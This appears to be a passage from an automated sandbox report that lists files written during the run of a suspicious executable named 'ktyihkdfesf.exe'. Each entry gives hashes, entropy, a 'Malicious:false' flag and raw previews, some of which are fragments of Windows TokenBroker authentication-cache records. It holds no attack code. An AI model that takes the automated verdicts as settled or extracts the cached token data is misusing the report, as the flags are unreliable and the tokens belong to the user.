                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:uriCache_

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.010555532399728
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclREVcTWS5n:YWLSGTt1o9LuLgfGBPAzkVj/T8lGViTn
                                                                                                                                                                                                                                                                                                MD5:B2017AD4458171A4E5420B9CD365C6CB
                                                                                                                                                                                                                                                                                                SHA1:6F58FD27910A6173DCC7C968DFA234711BCFCC01
                                                                                                                                                                                                                                                                                                SHA-256:ADC8CD39EA90FC33BCEEEA97D5961B0CA09FF681BFCFEDA56930CDD501DEBE9D
                                                                                                                                                                                                                                                                                                SHA-512:3700A0A473A5349F35DE2CDF882C7933318FCBE91D4687C872CB3CC88BCFB1BBD7B11E903B68E0EF1639D82C715D338C2EDCBB6D33095529EFDE61C064AA9558
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734777096370005}]}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                                SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                                SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                                SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\adc90e27-73ce-4b65-ba85-1623dc1072af.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44922
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.09494174462605
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvYi1zNtPSN6IC6CsKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn/FKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:17DD9B46D87BDB86C4D0A7528A9FD28E
                                                                                                                                                                                                                                                                                                SHA1:41FFB886512F4C041D5C1F8EB6EBA62C0D594AE0
                                                                                                                                                                                                                                                                                                SHA-256:8567EBFEC30F1BE0B55CABECBE374A2EE98FF5E42DD4ED62D639D83B94C0332A
                                                                                                                                                                                                                                                                                                SHA-512:42D7DFCA272E2165299F690E55FC78783DA400DB6FC511120FC856C4AFE4A5435302B0D0302C3CCAF4028791420400AA4B3D2C1D52E127D559541710437E6B53
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c43a26e4-dca9-4c08-b428-63aebd7baaf7.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44455
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089772247328986
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynOukzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:6356EC0D498B0C96EB67C9B703292822
                                                                                                                                                                                                                                                                                                SHA1:04F3FD4D1E2C26E4D515AF619FC43F4648D889AA
                                                                                                                                                                                                                                                                                                SHA-256:D26948D35C2A90233F45991416939161E8062EE802836E5C068A69AFB940C99B
                                                                                                                                                                                                                                                                                                SHA-512:37D6613948326F6775EDF004CF7FE1763904A0FC3FA940BD62722DDC9A745A271BDD59122DDF22860941A5FA235BF5FC51273E4E2019D138CCBC7928CF41E68D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f68f05ed-1a1a-481a-bd36-3fbbfe288236.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44988
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.095138731373029
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xW2Yi1zNtPS92uzh9LVjhKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yOGLKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:D957DFC31F3F54BE0AC13CC2E1F127AF
                                                                                                                                                                                                                                                                                                SHA1:75DDAE21C05A642562554FD1BC784634F3448D21
                                                                                                                                                                                                                                                                                                SHA-256:AF00FBD0969B99A381F0993C4BE3835EED77B0CA159D2250F6EF0C031723ABFF
                                                                                                                                                                                                                                                                                                SHA-512:A7824DC59DAE7419B773190715387785F22D07BFEA518DFD3DC2D1CAC5E2F0C6C042C27B122462D77EB9D1AF855ECC56B90E5A371F1404218EBE1152C553F0B5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8567878402608633
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKxrgx2xl9Il8um2F3Q9/4oulR/XU8d1rc:mnYgK3Q9/fgQ
                                                                                                                                                                                                                                                                                                MD5:B57625228DF9BA51C72491C5B4C84E54
                                                                                                                                                                                                                                                                                                SHA1:0ACA5256A3E8B58275DF30405C747D87EBB3EDEA
                                                                                                                                                                                                                                                                                                SHA-256:225D61634DC698A4D95A6BC543F0237133D272FB9691D3DCD3300A7A54DE6AC6
                                                                                                                                                                                                                                                                                                SHA-512:DC6A09B0E359091E4C74F99BC3F0C4C4BE41B349909A71118AA6BA037C8850C25595C78F04EFAA56488972BFDCCBCC6DE170633D8E26F10B7BCAA2F368053803
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.I.8.N.M.r.F.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.t.g.l.0.y.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9945724843531507
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:SYgKf0JsbFpHOPP0GBM2Z0I2R+YcVQXvFyCvqXcAn:SnJWyrRZ0tRWyZiR
                                                                                                                                                                                                                                                                                                MD5:834850807AFA9CAB8F613D6BCD551746
                                                                                                                                                                                                                                                                                                SHA1:0733B37FBF1B714C8FD799FFD866E5F520AB4986
                                                                                                                                                                                                                                                                                                SHA-256:5EBB18CEB4D77BF378356E8E4FDB445B0E56FD6A0A8D1E66B732A55D543E2F58
                                                                                                                                                                                                                                                                                                SHA-512:0CB46403E7F67A1E79D794E439A5FC5F20BA94A2386E4E0E8037539C0D73F418463DBB4817A80AC73535DBC8001D2F5CD99B4683BAA06316D6CA7B354A0D83B2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Y.A.3.2.F.6.l.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.t.g.l.0.y.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9113697755471475
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7xzYyxl9Il8um2Fjwl0ORJoZq1kJEOU3mmBOE/El6qzd/vc:aB3YgK8l02JEq1qU3PBOE/iJu
                                                                                                                                                                                                                                                                                                MD5:C9D11BE358257A32356010D75B27E8D2
                                                                                                                                                                                                                                                                                                SHA1:512EAA9F12BE1E9A188CDAF6B5E2F0389CDEBC4C
                                                                                                                                                                                                                                                                                                SHA-256:C5279EF75EFAD0BEC1CE176A18D160C1E6768FAF54468C30ADE995C5A293E718
                                                                                                                                                                                                                                                                                                SHA-512:2CD80C5147DCEBF9B195D986408F9E392FDF51B64D1BCBCD863408D8E91523405143DF01FD59DAAA305F6987A67FCD02D76063687D2FAB8B7112128329A22B85
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".l.q.C.1.S.H.p.x.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.t.g.l.0.y.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\json[1].json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3500
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.395639551191737
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:6NnCTYDHCT0NnCgbC9NnCfYfYc9CfYfNnC9l5dgEC9XNnCWR9CWqNnCcDCrNnCvl:6NDNQNkYfYXYfN+l5wXNxRfqNr2NhuXL
                                                                                                                                                                                                                                                                                                MD5:BE43E67816E85B4184EF930D04487DC1
                                                                                                                                                                                                                                                                                                SHA1:59636F0EACE4562038F010B893EEDD62F600332F
                                                                                                                                                                                                                                                                                                SHA-256:3D8D386B5AD142142AE317DB2D0BC1781CA0160466F13C1A4911D105C6D3E85B
                                                                                                                                                                                                                                                                                                SHA-512:442E20F676EE7811EAFF91FC583FF0821BC701696AE9CDEA8208B2D0E86972AA235BE2C723AA4FA212AC36BF84D62C2EAC58D491BDA66300B34AAE948BA91CBA
                                                                                                                                                                                                                                                                                                Malicious:false
